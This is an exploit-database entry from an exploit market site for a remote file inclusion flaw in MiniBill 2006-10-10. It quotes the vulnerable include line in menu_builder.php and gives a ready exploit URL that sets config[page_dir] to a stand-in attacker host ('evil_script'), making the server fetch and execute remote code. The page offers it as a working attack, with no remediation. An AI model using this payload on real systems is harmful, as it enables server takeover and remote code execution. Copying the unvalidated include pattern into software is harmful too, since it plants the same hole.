[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MiniBill <= 20061010 (menu_builder.php) File Include Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1068
Category
web applications
Date add
25-10-2006
Platform
unsorted
==================================================================
MiniBill <= 20061010 (menu_builder.php) File Include Vulnerability
==================================================================




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MiniBILL v2006-10-10 (config[page_dir] Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

line 71: include($config['page_dir']."menu.php");


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/include/menu_builder.php?config[page_dir]=http://evil_script?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: kacper, Preddy, chaos ,nukedx, SHiKaA, DJR



#  0day.today [2024-11-16]  #